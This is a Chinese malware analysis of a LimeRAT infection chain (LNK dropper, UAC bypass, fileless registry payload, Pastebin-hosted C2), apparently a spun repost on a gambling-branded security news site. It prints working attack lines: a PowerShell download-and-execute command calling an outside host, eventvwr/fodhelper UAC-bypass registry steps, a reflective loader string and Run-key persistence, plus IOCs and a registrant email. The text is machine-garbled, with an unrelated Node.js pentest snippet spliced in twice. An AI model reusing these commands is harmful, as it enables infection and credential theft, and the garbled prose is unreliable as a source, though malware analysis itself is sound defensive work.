LimeRAT在野外流传 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

LimeRAT在野外流传

申博_新闻事件 申博 427次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

引见

几天前,Cybaze-Yoroi ZLab平安团队遇到了一类风趣的沾染链,它应用多种庞杂手艺,能够或许绕过传统平安防御机制并隐蔽其payload,对目标用户形成严重威胁。

全部沾染链始于一个LNK文件,应用LNK文件举行进击是APT构造经常运用的手艺之一,因而我们决议对这些歹意样本举行更深切的研讨,在研讨历程当中,我们还发现了另一个早被用滥的开源项目,许多时刻,收集犯罪分子会在个中植入歹意软件。

LimeRAT在野外流传

手艺剖析

沾染链的劈头是一个简朴的LNK文件,旨在经由历程以下敕令从长途地位下载并运转名为“rdp.ps1”的PowerShell文件:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Windo 1 $wm=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWVY'));sal g $wm;$IF=((New-Object Net.WebClient)).DownloadString('https://hacks4all[.net/rdp.ps1');g $I

检索到的Powershell剧本是全部沾染链的dropper。

LimeRAT在野外流传

此Powershell剧本起首运用“Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version”敕令检索目标盘算机上装置的Windows操作系统的版本。接着依据返回的值,应用一些相应的权限提拔破绽,以绕过UAC(用户帐户掌握)功用——这是自Windows Vista起引入的一种平安机制,能够制止未经受权的系统配置变动。剧本的主要目标就是在版本低于8.1的Windows中,应用EventViewer历程上的设想缺点来实行具有更高特权的敕令。

对此破绽的应用历程是异常轻易的:歹意软件能够接见注册表项“HKCU:\ Software \ Classes \ mscfile \ shell \ open \ command”,并在此处插进去敕令,经由历程强制实行“eventvwr.exe”历程来运转其payload,因为平安破绽,能够以最高权限运转该历程。

LimeRAT在野外流传

LimeRAT在野外流传

图1:搜检目标Windows版本并为eventvwr.exe历程破绽应用做准备

第二个破绽则涉及到Windows 10操作系统:是FODhelper历程中的一个破绽。此破绽应用的道理与前一个相似,但接见的注册表项是“HKCU:\ Software \ Classes \ ms-settings \ Shell \ Open \ command”,而受进击的历程则是“fodhelper.exe”。

LimeRAT在野外流传

LimeRAT在野外流传

图2:搜检目标Windows版本并为fodhelper.exe历程破绽应用做准备

以后运转Powershell payload,payload在解码后会挪用分外的JavaScript代码。这个剧本的主体包罗一个嵌入其他子函数的唯一匿名函数和一个很大的隐约变量。

LimeRAT在野外流传

图3:以Base64花样编码的payload,与自定义子顺序殽杂

LimeRAT在野外流传

图4:子顺序去殽杂后的局部代码

它的payload是一个参数化的Powershell剧本,目标是将终究payload装置到用户注册表hive中,从而完毕沾染链。

[
 "Wscript.Shell",
 "scriptfullname",
 "scriptname",
 "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command ",
 "%",
 "ExpandEnvironmentStrings",
 "Temp",
 "\\",
 "fromCharCode",
 "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Temp')+'\\",
 "',[System.IO.File]::ReadAllText('",
 "'));wscript '",
 "'",
 "Run",
 "Quit",
 "New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -name 'FileName' -value '",
 "' -PropertyType String -Force;",
 "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\\",
 "'))",
 
 " ##### FINAL PAYLOAD ##### "
 "HKCU\\SOFTWARE\\Microsoft\\\\Winkey",
 "Scripting.FileSystemObject",
 "REG_SZ",
 "regwrite",
 "$_b = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'Winkey').Winkey;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
]

LimeRAT在野外流传

图5:注册表项中以base64花样编写的终究payload

Payload

渗入测试中的Node.js——应用C++插件隐蔽实在代码

0x00 前言 在之前的文章《渗透测试中的Node.js——Downloader的实现》开源了一个使用Node.js实现Downloader的代码,简要分析在渗透测试中的利用思路。 Node.js的语法简单易懂,所以Node.js代码也很容易被分析。 为了增加Node.js代码被分

终究的payload实际上是一个Base64编码的PE32文件,为了隐匿反病毒检测,不会将文件存储到注册表hive中。它是用c#编写的,最少须要. net framework 3.2能力运转。经由历程对歹意软件代码的研讨,我们发现了多个证据注解该歹意软件能够属于LimeRAT歹意软件家属。

LimeRAT是一款功用强大的长途管理工具,也是Github上免费供应的一个开源项目,任何互用户都能够运用。将其源代码与反编译样例举行对照,我们能够或许确认歹意软件的payload和这个开源长途管理工具之间具有很高的兼容性。

LimeRAT在野外流传

图6:静态payload数据

LimeRAT在野外流传图7:反编译代码(左侧)和Github平台上的源代码(右侧)

歹意软件的功用与上述开源代码的婚配度异常高。别的它也做了一些修改,比方,歹意软件能够将本身注册为“Critical Process”,当用户试图杀死它时,机械上就会涌现蓝屏死机(BSoD)。除此之外,歹意软件另有一整套异常强大和风险的功用,好比:

· 经由历程USB驱动器流传,沾染USB驱动器上的一切文件和文件夹。

· 无文件启动要领以回避AV检测。

· 虚拟机和剖析箱,一样是为了制止检测。

· Stealer和CryptoStealer模块则是盗取加密泉币钱包和生存的暗码。

· 键盘记录模块。

· 后门和RDP接见。

C2效劳器

LimeRAT在野外流传

图8.对C2的检索

歹意软件的C2效劳器经由历程滥用Pastebin效劳来下降被检索到的能够性。实在的C2目标地地点须要经由历程加密的HTTPS通道从pastie动态检索。

另外,进击者依赖于动态DNS效劳“warzonedns.com”,该效劳指向位于俄罗斯的213.183.58 [.10 IP地点。

观察此地点后,我们找到了注册商的电子邮件地点,“anthony.marshall.1986 [@gmail [.com”,这个邮件地点曾涌现在2017年一个尽人皆知的AdWind / JRat歹意运动中,注解该歹意行动者是暂时活泼的。

耐久性机制

此歹意软件还运用了多种耐久性机制,使得暂时事宜相应顺序更难挣脱沾染的掌握,多种耐久性机制有助于确保沾染持续时间更长。更具体地说,它应用了最少三种分歧的耐久性技巧,将本身复制到三种分歧的途径中:

· C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

· C:\Users\public\

· %APPDATA%\Local\Temp\

LimeRAT在野外流传

图9:歹意软件的耐久性机制

JavaScript代码经由历程以下powershell敕令实行:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value 'C:\Users\admin\AppData\Local\Temp\fuw.js' -PropertyType String -Force;"

结论

在我们的剖析案例中能够看出:一些开源项目正愈来愈常被黑客滥用,并被融入到一些尽人皆知的歹意软件中去。黑客经由历程对它们不断地编排、改进来回避基础的平安掌握、渗入企业平安的界限。

渗入测试中的Node.js——应用C++插件隐蔽实在代码

0x00 前言 在之前的文章《渗透测试中的Node.js——Downloader的实现》开源了一个使用Node.js实现Downloader的代码,简要分析在渗透测试中的利用思路。 Node.js的语法简单易懂,所以Node.js代码也很容易被分析。 为了增加Node.js代码被分


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明LimeRAT在野外流传
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址